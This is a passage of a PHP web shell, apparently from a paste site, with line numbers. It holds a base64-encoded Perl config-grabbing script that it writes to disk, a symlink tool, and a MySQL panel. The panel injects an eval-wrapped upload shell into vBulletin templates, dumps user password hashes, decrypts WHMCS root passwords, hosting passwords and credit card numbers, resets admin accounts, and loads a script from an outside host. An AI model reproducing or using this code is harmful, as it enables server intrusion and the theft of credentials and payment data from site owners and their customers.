d+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
  896.  
  897. $write = fwrite ($f2 ,base64_decode($sml_perl));
  898.  
  899. if ($write)
  900. {
  901.  
  902. @chmod('sa2/perl.pl',0755);
  903.  
  904.  
  905. }
  906.  
  907. echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
  908. }
  909.  
  910.  
  911. break;
  912.  
  913.  
  914. }
  915. /// home ///
  916. }
  917. }
  918. else
  919. {
  920.  
  921. echo '
  922. The file path to symlink
  923.  
  924. <br /><br />
  925. <form method="post">
  926. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  927. <input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
  928. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  929.  
  930.  
  931.  
  932. </form>
  933. ';
  934.  
  935.  
  936. $pfile = $_POST['file'];
  937. $symfile = $_POST['symfile'];
  938. $symlink = $_POST['symlink'];
  939.  
  940. if ($symlink)
  941. {
  942.  
  943. @symlink("$pfile","sym/$symfile");
  944.  
  945. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
  946. exit;
  947. }else {exit;}
  948.  
  949.  
  950.  
  951.  
  952. }
  953.  
  954.  
  955.  
  956. break;
  957.  
  958.  
  959.  
  960. //////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
  961.  
  962.  
  963. case 'ms':
  964.  
  965.  
  966.  
  967.  
  968. $host = $_POST['host'];
  969. $user = $_POST['user'];
  970. $pass = $_POST['pass'];
  971. $db = $_POST['db'];
  972.  
  973.  
  974.  
  975.  
  976.  
  977.  
  978. ////////////////// HEEEEEEEEEEEEERE  /////////////////////////////////////////////// HEEEEEEEEEEEEERE  /////////////////////////////
  979.  
  980. if ($_GET['show'] == 'tb'){
  981.  
  982. $host_c =  $_COOKIE['host_mysql'];
  983. $user_c =  $_COOKIE['user_mysql'];
  984. $pass_c =  $_COOKIE['pass_mysql'];
  985. $db_c   =  $_COOKIE['db_mysql'];
  986.  
  987.  
  988. $con = @mysql_connect($host_c,$user_c,$pass_c);
  989. $sel = @mysql_select_db($db_c);
  990.  
  991.  
  992. if(!$sel){ echo "mysql connect error" ; exit;}
  993.  
  994. $dbname = $db_c;
  995.  
  996. $pTable =  mysql_list_tables( $dbname ) ;
  997.  
  998. $num = mysql_num_rows( $pTable );
  999.  
  1000. echo "<div class='tmp'>
  1001. <table align='center' width='40%'><td> Tables </td><td> Rows </td>";
  1002.  
  1003. for( $i = 0; $i < $num; $i++ ) {
  1004.  
  1005.  
  1006.     $tablename = mysql_tablename( $pTable, $i );
  1007.  
  1008.     $sq3l=mysql_query("select  * from $tablename");
  1009.  
  1010.     $c3t=mysql_num_rows($sq3l);
  1011.  
  1012.     echo "
  1013.  
  1014.     <tr>
  1015.  
  1016. <td>
  1017. <div class='dom'><a  href='$pg?sws=ms&show=cl&tb=$tablename'  />".$tablename." </a> </div>
  1018. </td>
  1019.  
  1020.  
  1021. <td>
  1022. ".$c3t."
  1023. </td>
  1024.  
  1025. </tr>
  1026.  
  1027.     ";
  1028.  
  1029.  
  1030.  
  1031.  
  1032. if ($tablename == 'template')  { $secript = 'vb'; }
  1033.  
  1034. else if ($tablename == 'wp_post') {$secript = 'wp';}
  1035.  
  1036. else if ($tablename == 'jos_users') {$secript = 'jm';}
  1037.  
  1038. else if ($tablename == 'tbladmins') {$secript = 'wh';}
  1039.  
  1040.  
  1041. }
  1042.  
  1043.  
  1044. if ($secript == 'vb')
  1045.  
  1046. {
  1047.  
  1048.  
  1049. echo '<div class="cont">
  1050. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
  1051. <br />  <br /> <b>
  1052. [ <a href="?sws=ms&op=in"> Update Index </a>]
  1053.  
  1054. [<a href="?sws=ms&op=sh"> Inject shell</a>]
  1055.  
  1056. [ <a href="?sws=ms&op=shm" >Show members Information</a>]
  1057. ';
  1058.  
  1059.  
  1060. }
  1061.  
  1062.  
  1063.  
  1064. else if ($secript == 'wp')
  1065. {
  1066.  
  1067.  
  1068.   echo '
  1069.  <div class="cont">
  1070.  <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Wordpress </b><div>
  1071. <br />  <br /> <b>
  1072. [ <a href="?sws=ms&op=awp"> Change admin </a>]
  1073.  
  1074. [ <a href="?sws=ms&op=shwp" >Show members</a>]';
  1075.  
  1076.  
  1077.   }
  1078.  
  1079.  
  1080. else if ($secript == 'wh'){
  1081.  
  1082.   echo '
  1083.  <div class="cont">
  1084.  <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
  1085. <br />  <br /> <b>
  1086. [ <a href="?sws=ms&op=hroot">roots</a>]
  1087. [ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
  1088. [ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
  1089. [ <a href="?sws=ms&op=trak" >tickets</a>]
  1090. [ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
  1091.  [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
  1092. [ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
  1093.  
  1094.  
  1095. }
  1096. else{echo '<div class="cont"> ';}
  1097.  
  1098.  
  1099. /////////////// cmd ////////////////////////////////
  1100.  echo "<br /><br />
  1101.  
  1102.  [ <a href='?sws=ms&op=bkup'> baukup </a>]
  1103.  [ <a href='?sws=ms&op=css'> Inject css </a>]
  1104.  <br /><br />
  1105. <form method='post'>
  1106. <textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
  1107. <input type=\"submit\" value=\"SQL\" name='cmd'/>
  1108. </form>
  1109. <br /><br />
  1110. <a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
  1111.  
  1112. if (isset($_POST['cmd']))
  1113. {
  1114.  
  1115. $sql  = $_POST['sql'];
  1116.  
  1117. $query =@mysql_query($sql,$con) or die;
  1118.  
  1119. if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">CMD sql successfully </div>  </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red;  font-weight: bold\">CMD sql error </div>  </center>";}
  1120.  
  1121.  
  1122. }
  1123.  
  1124. exit;
  1125.  
  1126.  
  1127. }
  1128.  
  1129. ///////////////////// show cl ///////////////
  1130. else if ($_GET['show'] == 'cl')
  1131.  
  1132. {
  1133.  
  1134.  
  1135.  
  1136.  
  1137.  
  1138.     $host_c =  $_COOKIE['host_mysql'];
  1139.     $user_c =  $_COOKIE['user_mysql'];
  1140.     $pass_c =  $_COOKIE['pass_mysql'];
  1141.     $db_c   =  $_COOKIE['db_mysql'];
  1142.  
  1143.  
  1144.     $con = @mysql_connect($host_c,$user_c,$pass_c);
  1145.     $sel = @mysql_select_db($db_c);
  1146.  
  1147.     $tb = $_GET['tb'];
  1148.  
  1149.     $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
  1150.  
  1151.     $num2 = mysql_num_rows( $col_sws );
  1152.     echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
  1153.     for( $i2 = 0; $i2 < $num2; $i2++ ){
  1154.  
  1155.     $col = mysql_fetch_row($col_sws) ;
  1156.     $um_sws =  $col[0];
  1157.  
  1158.      echo "<tr><td>$um_sws&nbsp;</td>" ;
  1159.  
  1160.  
  1161.      $tit = mysql_query ("SELECT * FROM $tb" );
  1162.      while ($row = mysql_fetch_assoc($tit))
  1163.      {
  1164.  
  1165.       $cont = $row[$um_sws] ;
  1166.  
  1167.      echo "<td>$cont</td></tr>" ;
  1168.  
  1169.  
  1170. }
  1171.  
  1172. ;
  1173.  
  1174.  
  1175. }
  1176.  
  1177.  
  1178.  
  1179.  
  1180. exit;
  1181.  
  1182.  
  1183. }
  1184.  
  1185.  
  1186.  
  1187.  
  1188.  
  1189.  
  1190.  
  1191.  
  1192.  
  1193. if (isset($_COOKIE['host_mysql'])){
  1194.  
  1195. if (!isset($_GET['op'])){
  1196.  
  1197. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
  1198.  
  1199.  
  1200. exit;
  1201. }
  1202.  
  1203.  
  1204. }
  1205.  
  1206.  
  1207.  
  1208.  
  1209.  
  1210. else if (!isset($_COOKIE['host_mysql']))
  1211.  
  1212. {
  1213.  
  1214.  
  1215. if (!isset($host))
  1216. {
  1217.  
  1218.  
  1219. echo '
  1220.  
  1221. <div >
  1222.  
  1223. <br /><br /><br />
  1224. <pre><form method="POST">
  1225. host :<input type="text" name="host" /><br />
  1226. user :<input type="text" name="user" /><br />
  1227. pass :<input type="text" name="pass" /><br />
  1228. db   :<input type="text" name="db" /><br />
  1229. <input type="submit" name="login" value="login .."   />
  1230. </form></pre>';
  1231. exit;}
  1232. else
  1233. {
  1234.  
  1235. $host = $_POST['host'];
  1236. $user = $_POST['user'];
  1237. $pass = $_POST['pass'];
  1238. $db = $_POST['db'];
  1239.  
  1240.  
  1241. $con = @mysql_connect($host,$user,$pass) ;
  1242.  
  1243. $sel = @mysql_select_db($db,$con);
  1244.  
  1245. if (!$sel)
  1246. {
  1247.  
  1248. echo " MYSQL INFOTMATI NOT TREY ";
  1249.  
  1250.  
  1251. }
  1252.  
  1253. else
  1254. {
  1255.  
  1256.  
  1257.  
  1258. setcookie( "host_mysql", $host);
  1259. setcookie( "user_mysql", $user);
  1260. setcookie( "pass_mysql", $pass);
  1261. setcookie( "db_mysql", $db);
  1262. ob_end_flush();
  1263.  
  1264. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
  1265. exit;
  1266.  
  1267.  
  1268.  
  1269.  
  1270.  
  1271. }}}
  1272.  
  1273.  
  1274.  
  1275.  
  1276. /////////////////////////////////// Options /////////////////////////////////////////
  1277.  
  1278. if (isset($_GET['op']))
  1279. {
  1280.  
  1281. $op = $_GET['op'];
  1282.  
  1283.     $host_c =  $_COOKIE['host_mysql'];
  1284.     $user_c =  $_COOKIE['user_mysql'];
  1285.     $pass_c =  $_COOKIE['pass_mysql'];
  1286.     $db_c   =  $_COOKIE['db_mysql'];
  1287.  
  1288.     $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
  1289.     $sedb3 =@mysql_select_db($db_c,$con3) or die;
  1290.     if (!$sedb3){echo "error in mysql connect "; exit;}
  1291.  
  1292.  
  1293.       /////// index vb ////////
  1294.  
  1295. if ($op == 'in')
  1296. {
  1297.  
  1298. if (!isset($index)){
  1299.  
  1300. echo '
  1301.     Your index : <br /><br />
  1302.      <form  method="post">
  1303.  
  1304.      <textarea rows="7" name="index" cols="40"></textarea>
  1305.  
  1306.      <br /><br />
  1307.      <input type="submit" value="Update Index" maxlength="30" name="sql" />
  1308.      </form> ';
  1309. }
  1310. else if ($_POST['sql'])
  1311. {
  1312.  
  1313.  
  1314. $index =$_POST['index'];
  1315.  
  1316. $index=str_replace("\'","'",$index);
  1317. $crypt  = "{\${eval(base64_decode(\'";
  1318. $crypt .= base64_encode("echo \"$index\";");
  1319. $crypt .= "\'))}}{\${exit()}}</textarea>";
  1320. $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
  1321. $query =@ mysql_query($sqlindex);
  1322.  
  1323. if ($query)
  1324. {
  1325.   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index successfully </div>  </center>";
  1326.   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1327.   exit;
  1328. }
  1329. else if (!$query)
  1330. {
  1331.   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index erorr </div>  </center>";
  1332.   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1333.   exit;
  1334.  
  1335. }
  1336.  
  1337.  
  1338.  
  1339.  
  1340. }
  1341.  
  1342.  
  1343.  
  1344.  
  1345.  
  1346.  
  1347.  
  1348.  
  1349.  
  1350.  
  1351. }
  1352. /////// shelllll ///////////
  1353. else if($op == 'sh')
  1354.  
  1355. {
  1356.  
  1357.  
  1358.  
  1359. if (!isset($_POST['ch']))
  1360. {
  1361.  
  1362.  
  1363. echo '
  1364. <br /><br /><br />
  1365. <form method="post">
  1366. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  1367. <select name="ch">
  1368. <option value="faq">Inject shell in faq </option>
  1369. <option value="cal">Inject shell in calendar </option>
  1370. <option value="sea">Inject shell in search </option>
  1371. </select>
  1372. <br /><br /><br />
  1373. <input type="submit" name="sql" value="Inject shell"  />
  1374. </form>
  1375.  
  1376.  
  1377.  
  1378. ';
  1379.  
  1380. } if (isset($_POST['sql'])){
  1381.  
  1382. $ch = $_POST['ch'];
  1383. $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
  1384. $crypt  = "{\${eval(base64_decode(\'";
  1385. $crypt .= "$shell";
  1386. $crypt .= "\'))}}{\${exit()}}</textarea>";
  1387.  
  1388.  
  1389.  
  1390.  
  1391. if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
  1392.  
  1393. elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
  1394.  
  1395. elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
  1396.  
  1397.  
  1398. $query =@ mysql_query($sqlfaq);
  1399.  
  1400. if ($query)
  1401. {
  1402.   echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
  1403.   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1404.   exit;
  1405. }
  1406. else if (!$query)
  1407. {
  1408.   echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been erorr !</div>  </center>";
  1409.   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1410.   exit;
  1411.  
  1412. }
  1413.  
  1414.  
  1415. }
  1416.  
  1417.  
  1418.  
  1419.  
  1420.  
  1421.  
  1422.  
  1423.  
  1424.  
  1425. }
  1426. else if ($op == 'shm')
  1427. {
  1428.  
  1429.  
  1430.  
  1431.  
  1432.  
  1433. $sql = 'select * from `user`';
  1434. $query =@ mysql_query($sql);
  1435.  
  1436. if ($query)
  1437. {
  1438.  
  1439. while ($row = mysql_fetch_assoc($query))
  1440. {
  1441.  
  1442. echo "
  1443. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  1444. <tr>
  1445.        <td>ID :</td>
  1446.        <td>user :</td>
  1447.        <td>pass :</td>
  1448.        <td>salt :</td>
  1449.        <td>email :</td>
  1450.  
  1451. </tr>
  1452.  
  1453. <tr>
  1454.        <td>".$row['userid']."</td>
  1455.        <td>".$row['username']."</td>
  1456.        <td>".$row['password']."</td>
  1457.         <td>".$row['salt']."</td>
  1458.         <td>".$row['email']."</td>
  1459. </tr>
  1460.  
  1461. </table>
  1462.  
  1463.   ";
  1464.  
  1465.  
  1466.  
  1467.  
  1468.  
  1469.  }}
  1470.  
  1471. }
  1472. else if ($op == 'out')
  1473. {
  1474.  
  1475. setcookie( "host_mysql", $host,time()-3600);
  1476. setcookie( "user_mysql", $user,time()-3600);
  1477. setcookie( "pass_mysql", $pass,time()-3600);
  1478. setcookie( "db_mysql", $db,time()-3600);
  1479. ob_end_flush();
  1480.  
  1481.  
  1482. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
  1483. exit;
  1484.  
  1485.  
  1486.  
  1487. }
  1488.  
  1489. ///////////////////////////////// whmcs ////////////////////////////////////////
  1490.  
  1491.  
  1492. else if ($op == 'hroot')
  1493. {
  1494.  
  1495.  
  1496.  
  1497.  
  1498.  
  1499.  
  1500. if (isset($_POST['viw']))
  1501. {
  1502.  
  1503. $hash = $_POST['hash'] ;
  1504.  
  1505.  
  1506. $query = mysql_query("SELECT * FROM tblservers");
  1507.  
  1508.         echo "<div class='tmp'><table cellpadding='5' align='center'>
  1509.         hosting roots
  1510.         <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
  1511.  
  1512.         while($row = mysql_fetch_array($query)) {
  1513.  
  1514.         echo "<tr>
  1515.         <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
  1516.  
  1517.         </tr>";
  1518.         }
  1519.         echo "</table>";
  1520.  
  1521.  
  1522.         $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
  1523.          echo "<table cellpadding='5' align='center'>
  1524.          <br /><br />
  1525.          Clients roots
  1526.         <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
  1527.  
  1528.         while($row = mysql_fetch_array($query)) {
  1529.  
  1530.         echo "<tr>
  1531.         <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
  1532.  
  1533.         </tr>";
  1534.         }
  1535.         echo "</table></div>";
  1536.         echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1537.         exit;
  1538.  
  1539.  
  1540. }
  1541. else
  1542. {
  1543.  
  1544. echo'<form method="post">
  1545.  <br /><br />
  1546. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
  1547. <input type="submit" name="viw" value="show"  />
  1548.  
  1549. </form>';
  1550. exit;
  1551.  
  1552.  
  1553.  
  1554.  
  1555.  
  1556. }
  1557.  
  1558.  
  1559. }
  1560.  
  1561.  
  1562. //////////// domine ////////////
  1563.  
  1564.  else if ($op == 'scard')
  1565.  
  1566. {
  1567.  
  1568. if (isset($_POST['viw']))
  1569. {
  1570.  
  1571. $hash = $_POST['hash'] ;
  1572.  
  1573.  
  1574. $query = mysql_query('select * from `tblclients`') ;
  1575. echo "<div class='tmp'><table cellpadding='5' align='center'> ";
  1576. while($v = mysql_fetch_array($query)) {
  1577.   echo "
  1578.   <tr><td>cardtype</td>
  1579.   <td>id</td>
  1580.   <td>firstname</td>
  1581.   <td>lastname</td>
  1582.   <td>email</td>
  1583.   <td>city</td>
  1584.   <td>ciuntry</td>
  1585.   <td>address1</td>
  1586.   <td>lastlogin</td>
  1587.   <td>phonenumber</td>
  1588.   <td>datecreated</td>
  1589.   <td>cardnum</td>
  1590.   <td>startdate</td>
  1591.   <td>expdate</td>
  1592.   </tr>";
  1593.     echo "<tr>
  1594.  
  1595.     <td>{$v['cardtype']}</td>
  1596.     <td>{$v['id']}</td>
  1597.     <td>{$v['firstname']}</td>
  1598.     <td>{$v['lastname']}</td>
  1599.     <td>{$v['email']}</td>
  1600.     <td>{$v['city']}</td>
  1601.     <td>{$v['ciuntry']}</td>
  1602.     <td>{$v['address1']}</td>
  1603.     <td>{$v['lastlogin']}</td>
  1604.     <td>{$v['phonenumber']}</td>
  1605.     <td>{$v['datecreated']}</td>
  1606.     <td>".decrypt ($v['cardnum'], $hash)."</td>
  1607.     <td>".decrypt ($v['startdate'], $hash)."</td>
  1608.     <td>".decrypt ($v['expdate'], $hash)."</td>
  1609.      </tr></div></table>";
  1610.      echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1611.      exit;
  1612.  
  1613.  }
  1614. }else
  1615. {
  1616.  
  1617. echo'<form method="post">
  1618.  <br /><br />
  1619. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
  1620. <input type="submit" name="viw" value="show"  />
  1621.  
  1622. </form>';
  1623. exit;
  1624.  
  1625.  
  1626.  
  1627.  
  1628.  
  1629. }
  1630.  
  1631.  
  1632.  
  1633.  
  1634.  
  1635.  
  1636.  
  1637. }
  1638.  
  1639.  else if ($op == 'chost')
  1640.  
  1641. {
  1642.  
  1643.  
  1644.  
  1645. if (isset($_POST['viw']))
  1646. {
  1647.  
  1648. $hash = $_POST['hash'] ;
  1649.  
  1650. $query = mysql_query("SELECT * FROM tblhosting");
  1651.     echo "<div class='tmp'><table cellpadding='5' align='center'>
  1652.     <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
  1653.     while($r = mysql_fetch_array($query)) {
  1654.     echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
  1655.     <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
  1656.     }
  1657.     echo "</table></div>";
  1658.    echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1659.  
  1660.     exit;
  1661.  
  1662.  
  1663.  
  1664. }
  1665. else
  1666. {
  1667.  
  1668. echo'<form method="post">
  1669.  <br /><br />
  1670. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
  1671. <input type="submit" name="viw" value="show"  />
  1672.  
  1673. </form>';
  1674. exit;
  1675.  
  1676.  
  1677.  
  1678.  
  1679.  
  1680. }
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686.  
  1687.  
  1688. }
  1689.  
  1690.  
  1691.  
  1692. else if ($op == 'cadmin')
  1693.  
  1694. {
  1695.  
  1696.  
  1697.  
  1698. if (isset($_POST['viw']))
  1699. {
  1700.  
  1701. $pass = md5($_POST['pass']);
  1702. $user = $_POST['user'];
  1703.  
  1704.  
  1705.  
  1706. $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
  1707. $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
  1708.  
  1709. if ($query)
  1710. {
  1711.   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
  1712.           echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1713.  
  1714.   exit;
  1715. }
  1716.  
  1717. else if (!$query)
  1718. {
  1719.   echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
  1720.           echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1721.  
  1722.   exit;
  1723.  
  1724. }
  1725.  
  1726.  
  1727.  
  1728.  
  1729.  
  1730.  
  1731.  
  1732. }
  1733. else
  1734. {
  1735.  
  1736. echo'<form method="post">
  1737.  <br /><br />
  1738. user : <input type="text" name="user" /><br /><br />
  1739. pass : <input type="text" name="pass" /><br /><br />
  1740. <input type="submit" name="viw" value="update"  />
  1741.  
  1742. </form>';
  1743.  
  1744.  
  1745. exit;
  1746.  
  1747.  
  1748.  
  1749.  
  1750.  
  1751. }
  1752. }
  1753.  
  1754.  
  1755.  
  1756. else if ($op == 'trak')
  1757.  
  1758. {
  1759.  
  1760. $page = $_GET['page'];
  1761. $numpr = 30;
  1762. if(!$page){$page = 0;}
  1763. $sql0 = mysql_query("Select * from tbltickets");
  1764. $num_r0s = mysql_num_rows($sql0);
  1765.  
  1766.  
  1767. $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
  1768.  
  1769. $ap = 1;
  1770. echo "<br /><br /><div>Page  : ";
  1771. for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
  1772. {
  1773.  
  1774. if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1775. else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1776.  
  1777.  
  1778. $ap ++;
  1779.  
  1780. }
  1781.  
  1782. echo "</div><br />";
  1783.  
  1784.  
  1785. while ($r3o = mysql_fetch_assoc($sql))
  1786. {
  1787.  
  1788. $email   = $r3o['email'];
  1789. $date    = $r3o['date'];
  1790. $title   = $r3o['title'];
  1791. $message = $r3o['message'];
  1792. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  1793.  
  1794. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
